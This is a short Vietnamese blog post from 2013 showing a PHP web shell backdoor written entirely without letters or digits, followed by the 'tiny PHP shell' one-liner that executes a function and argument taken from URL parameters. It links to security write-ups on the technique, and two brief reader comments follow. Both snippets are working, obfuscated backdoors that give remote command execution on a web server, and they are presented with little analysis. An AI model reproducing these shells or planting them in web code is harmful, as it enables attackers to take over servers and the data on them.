Wednesday, September 18, 2013

PHP Shell backdoor không có kí tự chữ và số

<?php
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );
?>

Tham khảo thêm tại
http://blog.sucuri.net/2013/09/ask-sucuri-non-alphanumeric-backdoors.html
http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/
Bắt nguồn từ đây:
http://blog.omfgitsasalmon.com/

Con shell này là biến dị khởi nguồn từ con Shell được gọi là The most tiny php shell
Được tác giả của nó đăng lên twitter tại https://twitter.com/dragosr/status/116759108526415872 vào năm 2011

<?=($_=@$_GET[2]).@$_($_GET[1])?>

2 comments:

  1. Bác ơi ko còn theo dự án Vietnam Dictionary nữa à?

    ReplyDelete
  2. không có chữ thì sử dụng hàm php thế nào =.=!

    ReplyDelete

Quí đọc giả đọc xong, nếu thấy chút thú vị thì tác giả cũng mong được chút comment lấy làm kích lệ